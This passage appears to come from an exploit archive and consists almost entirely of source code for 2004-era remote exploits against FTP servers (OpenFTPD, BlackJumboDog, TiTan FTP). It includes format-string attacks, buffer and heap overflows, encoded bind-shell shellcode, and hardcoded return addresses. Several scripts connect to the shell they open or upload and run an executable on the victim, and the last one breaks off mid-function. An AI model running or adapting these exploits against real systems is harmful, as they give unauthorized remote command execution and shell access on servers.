{ "Debian unstable", "2.3.2", 0x804db90, 0x40072c40 },
{ NULL, 0, 0 }
};
int connectserver(int *s, char *host, int port) {
struct sockaddr_in s_in;
struct hostent *he;
char *ip;
if ( (*s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
fprintf(stderr," can't create TCP socket\n");
return -1;
}
memset(&s_in, 0, sizeof(s_in));
s_in.sin_family = AF_INET;
s_in.sin_port = htons(port);
if ( (he = gethostbyname(host)) != NULL)
memcpy(&s_in.sin_addr, he->h_addr, he->h_length);
else {
if ( (s_in.sin_addr.s_addr = inet_addr(host) ) < 0) {
return -3;
}
}
if (connect(*s, (struct sockaddr *)&s_in, sizeof(s_in)) == -1) {
fprintf(stderr," can't connect to %s:%d\n", host, port);
return -4;
}
return 0;
}
int sendlogin(int s, char *username) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "USER %s\n", username);
return write(s, tmp, strlen(tmp));
}
int sendpassword(int s, char *password) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "PASS %s\n", password);
return write(s, tmp, strlen(tmp));
}
int purgemessage(int s) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "SITE MSG PURGE\n");
return write(s, tmp, strlen(tmp));
}
int delmessage(int s) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "SITE MSG DEL ALL\n");
return write(s, tmp, strlen(tmp));
}
int sendexploit(int s, char *username, int idx, char *exec) {
int i;
char tmp[4096], execcode[68], writecode[68];
unsigned short high, low, count1, count2;
int addr1, addr2;
high = targets[idx].system >> 16 & 0xFFFF;
low = targets[idx].system & 0xFFFF;
if (high > low) {
count1 = low;
count2 = high;
addr1 = targets[idx].fgetsgot;
addr2 = targets[idx].fgetsgot + 2;
} else {
count1 = high;
count2 = low;
addr1 = targets[idx].fgetsgot + 2;
addr2 = targets[idx].fgetsgot;
}
if (exec) {
strcpy(execcode, exec);
}
if (strlen(execcode) < 32) {
do {
strcat(execcode, "_");
} while (strlen(execcode) < 32);
}
/* calc count1:
*
* 1.) string will be stored in str => sprintf(str, " !C| !0%-66s !C|!0\n", buff);
* so we have to subtract 8 bytes from count1 (=> strlen("" !C| !0"))
* 2.) the next data will be our string for system call
* so we have to subtract strlen(execcode) from count1
* 3.) at least we have to subtract 8 bytes for the two addresses that are
* used for writing (%hn)
*/
count1 -= (strlen(execcode) + 16);
snprintf(writecode, sizeof(writecode),
"%c%c%c%c%c%c%c%c%%%du%%18$hn%%%du%%19$hn",
addr1 & 0xFF, (addr1 >> 8) & 0xFF, (addr1 >> 16) & 0xFF, (addr1 >> 24) & 0xFF,
addr2 & 0xFF, (addr2 >> 8) & 0xFF, (addr2 >> 16) & 0xFF, (addr2 >> 24) & 0xFF,
count1, count2 - count1 - 0x30);
snprintf(tmp, sizeof(tmp), "SITE MSG SEND %s %s%s\n", username, execcode, writecode);
printf(" len: %d, sending code [%s]\n", strlen(execcode) + strlen(writecode), tmp);
return write(s, tmp, strlen(tmp));
}
int readmessage(int s) {
char tmp[2048] = "";
snprintf(tmp, sizeof(tmp), "SITE MSG READ\n");
return write(s, tmp, strlen(tmp));
}
int attack(int s, char *user, char *password, int idx, char *exec) {
fd_set fs;
int selret, state, len, code;
char buffer[2048] = "";
FD_ZERO(&fs);
FD_SET(s, &fs);
state = SENDUSER;
do {
selret = select(s + 1, &fs, NULL, NULL, NULL);
if (selret > 0 && FD_ISSET(s, &fs)) {
memset(buffer, 0, sizeof(buffer));
len = read(s, buffer, sizeof(buffer));
printf("<<< %s\n", buffer);
sscanf(buffer, "%d", &code);
switch(state) {
case SENDUSER: sendlogin(s, user);
state = SENDPASS;
break;
case SENDPASS: sendpassword(s, password);
state = DELMESSAGE;
break;
case DELMESSAGE: delmessage(s);
state = PURGEMESSAGE;
break;
case PURGEMESSAGE: purgemessage(s);
state = SENDMESSAGE;
break;
case SENDMESSAGE: if (code > 500) {
fprintf(stderr, " login failed\n");
len = -1;
} else if (code == 230) {
fprintf(stderr, " sending exploit code ...\n");
sendexploit(s, user, idx, exec);
state = READMESSAGE;
}
break;
case READMESSAGE: sleep(5);
readmessage(s);
state = READING;
break;
case READING: if (code == 200 && strstr(buffer, "00000") && strstr(buffer, exec)) {
printf(" done\n");
}
break;
}
}
} while (len > 0);
}
void helpme(int argc, char **argv) {
int i;
printf("hoagie_openftpd - openftpd < 0.30.2 x86/linux remote\n");
printf("-andi / void.at\n\n");
printf("usage: %s -h hostname:port -u username -p password -t target -e command\n", argv[0]);
printf("\n\nexample:\n");
printf("%s -u localhost:21 -u anonymous -t 0 -e \"id > /tmp/0wned\"\n");
printf("\ntargets:\n");
for (i = 0; targets[i].sys != NULL; i++) {
printf("%d %s (libc: %s): 0x%0x 0x%0x\n", i, targets[i].sys, targets[i].libc, targets[i].fgetsgot, targets[i].system);
}
}
int main(int argc, char **argv) {
char optchar, *exec = NULL, server[512] = "", *username = NULL, *password = NULL;
int s, retval = -1, port, target = 0;
if (argc < 2) {
helpme(argc, argv);
} else {
while ( (optchar = getopt(argc, argv, "h:t:u:p:e:")) != EOF ) {
switch(optchar) {
case 'h': sscanf(optarg, "%[^:]:%d", server, &port);
break;
case 'u': username = optarg;
break;
case 'p': password = optarg;
break;
case 't': target = atoi(optarg);
break;
case 'e': exec = optarg;
break;
}
}
if (!strcmp(server, "")) {
strcpy(server, "127.0.0.1");
port = 21;
}
if (!username) {
username = "anonymous";
}
if (!password) {
password = "[email protected]";
}
if (!exec) {
exec = "id; killall msg; ";
}
fprintf(stderr, " connecting %s:%d (%s/%s)...\n", server, port, username, password);
if (!connectserver(&s, server, port)) {
retval = attack(s, username, password, target, exec);
close(s);
}
}
return retval;
}
// [2004-08-03]
21 OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit
/*
* shouts to mitakeet :D
*
* exploit for openftpd format string bug. tested on most current version only.
* -infamous42md AT hotpop DOT com is real email
*
* only tricky part is find a place to stick the shell, as there isn't enough
* room to send it with the format string. thankfully when using the 'site msg'
* commands, all of the args to command are passed directly through to the msg
* program. so when we tell ftpd to read messages with 'site msg read X', we
* pass the shellcode as X. the jumpslot for fclose() gets hijacked, and the
* retaddr lies early in stack, it's argv[3].
* no values are hardcoded into sploit, all come from command line, this works
* for me on slack 9:
*
* [n00b localho outernet] ./openf -u root -p "" -l 0x0804d8b8 -r 0xbffff9d4 -h
* localho -o 6969 -a 2 -b 18
* connected to localho
* Logged in as root
* Exploit sent
* connected to localho
* got a shell
*
* id
* uid=0(root) gid=0(root)
* groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(di sk),10(wheel),11(floppy)
*
* - Connection closed by user
*
* Usage: ./openf
* [ -u user ] [ -p pass ] [ -l retloc ] [ -r retaddr ]
* [ -b parms base ] [ -h host ] [ -o port ] [ -a align ]
*
* */
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>
#define SLOP 8
#define NOP 0x90
#define BS 0x1000
#define SBS 512
#define SHELL_PORT 7000
#define die(x) do{ perror(x); exit(1); }while(0)
typedef struct __args {
char *user, *pass;
char *host;
u_short port;
u_long retloc, retaddr;
int parms_base; /* distance to the dummy param */
int align;
} args;
/* call them shell code */
char sc[] =
"\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x 04\x24\x02\x89\xe6"
"\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\x b0\x01\xcd\x80\x50"
"\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\x cd\x80\x89\xc5\x6a"
"\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x 01\x55\x89\xe1\x31"
"\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x 50\x55\x89\xe1\xb0"
"\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\x c9\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x 73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x 80";
char *usage =
"\t[ -u user ] [ -p pass ] [ -l retloc ] [ -r retaddr ]\n"
"\t[ -b parms base ] [ -h host ] [ -o port ] [ -a align ]\n";
void parse_args(int argc, char **argv, args * argp)
{
int c;
while ((c = getopt(argc, argv, "a:u:p:l:r:b:h:o:")) != -1) {
switch (c) {
case 'a':
if ((argp->align = atoi(optarg)) < 0 || argp->align > 3)
goto pusage;
break;
case 'u':
argp->user = optarg;
break;
case 'p':
argp->pass = optarg;
break;
case 'l':
sscanf(optarg, "%lx", &argp->retloc);
break;
case 'r':
sscanf(optarg, "%lx", &argp->retaddr);
break;
case 'h':
argp->host = optarg;
break;
case 'o':
argp->port = atoi(optarg);
break;
case 'b':
if ((argp->parms_base = atoi(optarg)) > 0)
break;
/*
* fall thru
*/
pusage:
case ':':
case '?':
default:
fprintf(stderr, "Usage: %s\n%s", argv[0], usage);
exit(1);
}
}
if (optind != argc || !argp->user || !argp->pass || !argp->retloc ||
!argp->retaddr || !argp->host || !argp->port || !argp->parms_base)
goto pusage;
}
int conn(char *host, u_short port)
{
int sock = 0;
struct hostent *hp;
struct sockaddr_in sa;
memset(&sa, 0, sizeof(sa));
hp = gethostbyname(host);
if (hp == NULL) {
herror("ghbn");
die("bla");
}
sa.sin_family = AF_INET;
sa.sin_port = htons(port);
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0)
die("socket");
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)
die("connect");
printf("connected to %s\n", host);
return sock;
}
void login(char *user, char *pass, int sock)
{
char ubuf[BS], pbuf[BS];
snprintf(ubuf, BS - 1, "USER %s\r\n", user);
ubuf[BS - 1] = 0;
snprintf(pbuf, BS - 1, "PASS %s\r\n", pass);
pbuf[BS - 1] = 0;
sleep(1);
if (send(sock, ubuf, strlen(ubuf), 0) < 0)
die("send");
sleep(1);
if (send(sock, pbuf, strlen(pbuf), 0) < 0)
die("send");
sleep(1);
printf("Logged in as %s\n", user);
}
void get_fmt(args * argp, char *fb)
{
u_short high, low;
ulong retloc = argp->retloc, slop = 0;
int dummy = argp->parms_base, len = 0;
/* bytes printed before us */
slop = SLOP + argp->align;
/* ret addr */
low = (argp->retaddr & 0xffff);
high = argp->retaddr >> 16;
/* adjust ret addr words */
if (low > high)
high += (0x10000 - low);
else if (high > low)
high -= low;
else if (high == low) {
fprintf(stderr, "Can't encode a NULL high retaddr, bailing\n"
"high = %hx\tlow = %hx\n", high, low);
die("adsf");
}
low -= slop;
/* align */
memset(fb, 'A', argp->align);
fb[argp->align] = 0;
/* write code
* fmt look like:
* ALIGN-write_code-dummy-addr1-addr2-low_retaddr-high_retaddr
*/
sprintf(fb,
/* retL writeL retH writeH */
"%s" "%%%d$*%d$u" "%%%d$hn" "%%%d$*%d$u" "%%%d$hn",
fb, dummy, dummy + 3, dummy + 1, dummy, dummy + 4, dummy + 2);
/* args */
strcat(fb, "1111"); /* dummy */
len = strlen(fb);
*(u_int *) (fb + len) = retloc; /* write 1 */
len += sizeof(retloc);
*(u_int *) (fb + len) = retloc + 2; /* write 2 */
len += sizeof(retloc);
*(u_short *) (fb + len) = low; /* ret low */
*(u_short *) (fb + len + 2) = 0x0101; /* can't be 0 */
len += sizeof(retloc);
*(u_short *) (fb + len) = high; /* ret high */
*(u_short *) (fb + len + 2) = 0x0101; /* can't be 0 */
len += sizeof(retloc);
fb[len] = 0;
}
void sploit(args * argp, int sock)
{
char buf[BS], fmt[BS], sb[BS];
/* setup shell buf */
memset(sb, NOP, BS);
strncpy(sb + 100, sc, BS - 101);
sb[BS - 1] = 0;
get_fmt(argp, fmt);
/* slip them the poison */
snprintf(buf, BS - 1, "site msg send %s %s\r\n", argp->user, fmt);
buf[BS - 1] = 0;
if (send(sock, buf, strlen(buf), 0) < 0)
die("send");
sleep(5);
/* and make them eat it */
snprintf(buf, BS - 1, "site msg read %s\r\n", sb);
buf[BS - 1] = 0;
if (send(sock, buf, strlen(buf), 0) < 0)
die("send");
printf("Exploit sent\n");
sleep(1);
}
void shell(char *host, u_short port)
{
int sock = 0, l = 0;
char buf[BS];
fd_set rfds;
sock = conn(host, port);
printf("got a shell\n\n");
FD_ZERO(&rfds);
while (1) {
FD_SET(STDIN_FILENO, &rfds);
FD_SET(sock, &rfds);
if (select(sock + 1, &rfds, NULL, NULL, NULL) < 1)
die("select");
if (FD_ISSET(STDIN_FILENO, &rfds)) {
if ((l = read(0, buf, BS)) <= 0)
die("\n - Connection closed by user\n");
if (write(sock, buf, l) < 1)
die("write");
}
if (FD_ISSET(sock, &rfds)) {
l = read(sock, buf, sizeof(buf));
if (l == 0)
die("\n - Connection terminated.\n");
else if (l < 0)
die("\n - Read failure\n");
if (write(1, buf, l) < 1)
die("write");
}
}
}
int main(int argc, char **argv)
{
int sock = 0;
args args;
memset(&args, 0, sizeof(args));
parse_args(argc, argv, &args);
sock = conn(args.host, args.port);
login(args.user, args.pass, sock);
sploit(&args, sock);
close(sock);
sleep(20);
shell(args.host, SHELL_PORT);
return 0;
}
// [2004-08-04]
21 BlackJumboDog Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# blackJumboDog Exploit code by Tal zeltzer
#
use strict;
use IO::Socket::INET;
usage() unless(@ARGV == 2);
my $host = shift(@ARGV);
my $port = shift(@ARGV);
# win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
my $shellcode =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4f\x85".
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x 85\x7c\xcd\x19".
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x 84\xc5\x13\x05".
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x 84\xc1\xa9\xb0".
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x 42\xc4\x6a\x74".
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x 89\x64\x13\x15".
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\x da\x71\xc5\x14".
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x 89\xa4\xc3\x53".
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x 53\xa6\x5f\xce".
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x 85\x2f\x98\xdf".
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\x cc\xa9\xd1\xeb".
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x 68\xd3\xa3\x18".
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x 52\xa6\x47\xc6".
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x 7a\x7a\x9c\x16".
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\x b5\x1e\x58\x1f".
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\x b4\xf4\xcb\x1c".
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\x d0\x0b\xcb\x18".
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\x c6\x62\xdc\x4f".
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\x dc\xdc\x33\xc8".
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\x a1\x13\x99\x4e".
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x 08\x6b\xbc\x5f".
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x 7a\x5a\x98\x27".
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\x f0\x2f\xf0\xe2".
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x 7a\xfc\x67\x3a".
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x 7a\xff\x98";
my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
print "[+] Connected to host\r\n";
$socket->autoflush(1);
#receive banner
my $repcode = "220 ";
my $response = recv_reply($socket,$repcode);
#send USER command
my $username = "anonymous";
print $socket "USER $username\r\n";
$repcode = "";
select(undef, undef, undef, 1.002); # sleep of 1.2 sec
#Send PASS Command ( Evil Buffer )
# EIP At 308
# 7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )
printf "[+] Sending shellcode\r\n";
my $buf = "A"x308;
$buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward
$buf = $buf . "\x60\x2F\x4E\x7C";
$buf = $buf . $shellcode;
print $socket "PASS $buf\r\n";
select(undef, undef, undef, 1.002); # sleep of 1.2 sec
$repcode = "";
recv_reply($socket, $repcode);
close($socket);
system("telnet $host 4444");
exit(0);
sub usage
{
# print usage information
print "\nUsage: jumbo.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port\n\n";
exit(1);
}
sub recv_reply
{
# retrieve any reply
my $socket = shift;
my $repcode = shift;
$socket or die "Can't receive on socket\n";
my $res="";
while(<$socket>)
{
$res .= $_;
if (/$repcode/) { last; }
}
return $res;
}
// [2004-08-05]
21 TiTan FTP Server Long Command Heap Overflow PoC Exploit
/*
*-----------------------------------------------------------------------
*
* titanftp.c - TiTan FTP Server Long Command Heap Overflow PoC Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : lion cnhonker net
* : www cnhonker com
* Date : 2004-08-30
*
*-----------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 20480
#define SIZE 2048
// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);
int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];
void main(int argc, char *argv[])
{
WSADATA wsa;
unsigned short port;
unsigned long ip;
char user[32] = "anonymous";
char pass[32] = "anonymous";
char *command = "CWD ";
SOCKET s;
int size = OVERFLOWSIZE;
printf("TiTan FTP Server Long Command Heap Overflow PoC Exploit\r\n");
printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");
if(argc < 3)
{
printf("%s <TargetHost> <TargetPort>\r\n", argv[0]);
return;
}
WSAStartup(MAKEWORD(2,2),&wsa);
while(1)
{
if((s=create_socket())==0)
{
printf("[-] ERROR: Create socket failed.\r\n");
return;
}
if(!client_connect(s, argv[1], atoi(argv[2])))
exit(-1);
loginftp(s, user, pass);
memset(sendbuf, 0 ,BUFFSIZE);
memcpy(sendbuf, "pasv\r\n", 6);
writebuf("Send pasv", s, sendbuf, 6);
readbuf("read", s, recvbuf, BUFFSIZE);
memset(sendbuf, 0, BUFFSIZE);
memset(sendbuf, 'A', size);
memcpy(sendbuf, command, strlen(command));
sendbuf[size-2] ='\r';
sendbuf[size-1] ='\n';
printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);
show=1;
writebuf("Send overflow buff", s, sendbuf, size);
readbuf("read", s, recvbuf, BUFFSIZE);
//send QUIT
memset(sendbuf,0, BUFFSIZE);
sprintf(sendbuf, "%s\r\n", "QUIT");
writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));
//show=1;
//readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE);
//return;
if(s)
closesocket(s);
Sleep(2000);
}
WSACleanup();
}
int create_socket()
{
int sockfd;
sockfd=socket(AF_INET,SOCK_STREAM,0);
if(sockfd<0)
{
printf("[-] Create socket error.\r\n");
return(0);
}
return(sockfd);
}
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if((host=gethostbyname(server))==NULL)
{
printf("[-] ERROR: gethostbyname(%s) error\n", server);
return(-1);
}
memset(&cliaddr, 0, sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("[+] Trying %s:%d......", server, port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("FAILED!\r\n");
closesocket(sockfd);
return(-1);
}
printf("OK!\r\n");
return(1);
}
int writebuf(char *s,int socket,char *buffer,int len)
{
int j;
if(s)
{
printf("[+] %s......", s);
fflush(stdout);
}
j=send(socket,buffer,len,0);
if(j<=0)
{
printf("FAILED!\r\n");
exit(-1);
}
printf("OK!\r\n");
return j;
}
int readbuf(char *s,int socket,char *buffer,int len)
{
int a,b,i,j=0;
a=b=i=0;
memset(buffer,0,len);
if(s)
{
printf("[+] %s......", s);
fflush(stdout);
}
j=recv(socket,buffer,len-1,0);
if(j <= 0)
{
if(s) printf("FAILED!\n");
printf("[-] Recv data error.\n");
exit(-1);
}
if(s) printf("OK!\n");
buffer[len-1]='\0';
if(show==1) printf("<==\r\n%s<==\r\n",buffer);
return j;
}
void checkstatus(char *s)
{
if(s==NULL) exit(-1);
if(isdigit(*s))
{
if(s[0]=='5')
{
printf("[-] Server told:%s\n",s);
exit(-1);
}
else return;
}
printf("[-] Server said:%s\n",s);
exit(-1);
}
void loginftp(SOCKET sockfd, char *user, char *pass)
{
int j;
show=1;
readbuf("Get FTP Server banner",sockfd, recvbuf, SIZE);
//show=0;
//send USER username
memset(sendbuf,0,BUFFSIZE);
j=sprintf(sendbuf,"%s %s\r\n", "USER", user);
writebuf("Send USER", sockfd,sendbuf,j);
readbuf(NULL,sockfd, recvbuf, BUFFSIZE);
checkstatus(recvbuf);
//send PASS password
memset(sendbuf,0,BUFFSIZE);
j=sprintf(sendbuf,"%s %s\r\n","PASS", pass);
writebuf("Send PASS", sockfd, sendbuf, j);
readbuf(NULL,sockfd,recvbuf, BUFFSIZE);
checkstatus(recvbuf);
printf("[+] User %s logged in.\r\n", user);
}
// [2004-08-31]
21 BlackJumboDog FTP Server 3.6.1 Remote Buffer Overflow Exploit
/*
6.9.04|www.Delikon.de|Delikon
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN
C:\Codes\blackjumbodog\Release>bjdexploit 192.168.0.3 21 klein.exe
BlackJumboDog FTP Server Buffer Overflow version 3.6.1
http://www.securiteam.com/windowsntfocus/5AP040ADPW.html
Thx to Chew Keong TAN
Delikon|6.9.04|www.Delikon.de
[+] Connected.
220 FTP ( BlackJumboDog Version 3.6.1 ) ready
[+]Shellcode length: 461
[+] Sending the shellcode
[+] Sleeping
[+] Opening File
[+] File found ready to send
[+] Connected
[+] Sending executable.
....
[+] All done, server have now executed your executable!
[+] Have a nice day
*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
//opens a port on 7777
//where you can upload a exe
//after terminating the network connection to port 7777
//the exe gets executed
//you will find the asm sourcecode at www.delikon.de
//it also exits with ExitThread, so the shellcode don't crashes the service
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x4A\xFE\x80\x30\x88\x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\x61\xE0\x89\x88\x88\xD3\xDD\x01\x6D\xEE\x 09\x64\xBC\x88\x01\x6E\xEE\x09"
"\x64\x84\x88\x60\x57\x88\x88\x88\x01\x4F\xDF\xE0\x 06\xC6\x86\x64\x60\x63\x88\x88"
"\x88\x01\xCD\x80\x05\xDB\xB8\xDA\x77\xDD\x80\x01\x CD\x80\x05\xDB\xB3\x01\xDE\xBC"
"\xE2\x85\xD1\xEE\x09\x71\x8F\x88\xFD\x8B\x03\xF5\x 80\x01\x86\xDF\x77\xFC\x03\x74"
"\x60\x37\x88\x88\x88\x03\x86\x01\xCC\x06\x74\x6A\x 6A\xEE\x09\x64\x18\x89\xDC\xE0"
"\x89\x89\x88\x88\x77\xDE\x8C\xB9\x77\xDF\xDF\xDF\x DF\xCF\xDF\xCF\xDF\x77\x9E\x01"
"\x4B\xB9\x77\xDF\xDF\xE0\x8A\x88\x96\xE9\x01\x6A\x E2\x98\xDA\xDB\x77\xDE\x80\xDF"
"\xDB\x77\xDE\x84\xDF\xDE\xDB\x77\xDE\x98\x01\x4B\x E2\x88\xE2\x8E\xE2\x8C\xE2\x88"
"\xE2\x8F\xE0\x88\x88\x88\x68\x77\xFE\xBC\x77\xDE\x AC\x01\x4F\x09\x64\x14\x77\x77"
"\x77\x01\x6D\x05\xDD\xEC\xE2\x88\xE0\xEC\x88\x88\x 88\xDA\xDB\x77\xDE\x9C\xB5\x77"
"\x77\x77\x77\xFC\x9D\xB5\x88\x88\x88\x88\xFC\x86\x 05\xDD\xEC\xE2\x88\xD9\xD8\xDA"
"\xDF\x77\xDE\xA0\x63\x5D\xDB\x77\xDE\x90\xDF\x77\x DE\xA4\xE0\x8D\x88\x88\x88\x77"
"\xFE\xBC\x77\xDE\xA8\xB9\x77\xDF\x77\xDE\x94\xDD\x DE\xEC\x29\xB8\x88\x88\x88\x03"
"\xC8\x84\x03\xF8\x94\x25\x03\xE0\x80\x01\x60\xD6\x D5\x4A\x8C\x88\xDB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x89\x 62\x03\xC2\x90\x03\xD2\xA8\x89"
"\x63\x6B\xBD\xC1\x03\xBC\x03\x89\x66\xB9\x77\x74\x B9\x48\x24\xB0\x68\xFC\x8F\x49"
"\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C\xFD\x69\x 03\xD2\xAC\x89\x63\xEE\x03\x84"
"\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89\x60\x61\x 8A\x88\x88\x88\xB9\x48\x01\x62"
"\xD7\xD6\xD5\xD3\x4A\x8C\x88\x60\x1B\x76\x77\x77\x 51\x81\x7D\x25\x43\x65\x74\xB3"
"\x2C\x92\xF8\x4F\x2C\x25\xA6\x61\x6D\xC1\x0E\xC1\x 3E\x91\x90\x6F\x6F\xF1\x4E\xF1"
"\x67\x46\x68\xE8\x10\x76\x02\x86\x2D\x9F\x88\xF4\x 97\xF1\x82\x60\x73\x1F\x75\x87"
"\xDF\xDB\xBA\xD7\xBB\xBA\xA6\xCC\xC4\xC4\x88\xDA\x B8\xB8\xFC\xA6\xED\xF0\xED\x88";
int fileupload(int port,char *FileName,char* ip){
FILE* file;
int sockfd, numbytes;
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
char *a=NULL;
int read=0;
printf("[+] Opening File\n");
file = fopen(FileName,"rb");
if (file==NULL) {
printf("[-] Open Failed\n");
return 0;
}
printf("[+] File found ready to send\n");
if ((he=gethostbyname(ip)) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
return 0;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return 0;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(port); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -
1) {
printf("[-] Connecting error\n");
return 0;
}
printf("[+] Connected\n[+] Sending executable.\n");
while (!feof(file)) {
read = fread(buf,sizeof(char),sizeof(buf),file);
Sleep(200);
if ((numbytes=send(sockfd,buf,read,0)) == -1) {
printf("[-] Sending executable failed\n");
return 0;
}
printf(".");
}
printf("\n[+] All done, server have now executed your executable!\n");
closesocket(sockfd);
WSACleanup();
return 1;
}
void banner(){
printf("BlackJumboDog FTP Server Buffer Overflow version 3.6.1\nhttp://www.securiteam.com/windowsntfocus/5AP040ADPW.html\nThx
to Chew Keong TAN\n");
printf("\nDelikon|6.9.04|www.Delikon.de\n");
}
void usage(){
printf("\nBJDExploit HOST PORT FileToUpload\n");
}
//#pragma lib <ws2_32.lib>
#pragma comment(lib,"ws2_32.lib")
int main(int argc,char *argv[]) {
int sockfd, numbytes;
//i have some problems with the ret-addresses
//only this one worked
//the SEH don't executes every address
// but i don't know the reason
DWORD RetAddr=0x6BD01395;
/* SYNCOR11.DLL XP sp2 full patched english version
6BD01395 5E POP ESI
6BD01396 33C0 XOR EAX,EAX
6BD01398 5D POP EBP
6BD01399 C2 0800 RETN 8
*/
struct hostent *he;
struct sockaddr_in their_addr;
char buf[1024];
int read=0;
WSADATA wsaData;
if(argc<3){
banner();
usage();
exit(1);
}
banner();
if(WSAStartup(0x101,&wsaData))
{
printf("[-] Unable to load winsock.\n");
return -1;
}
if ((he=gethostbyname(argv[1])) == NULL) { // get the host info
printf("[-] GetHostByName() Error!\n");
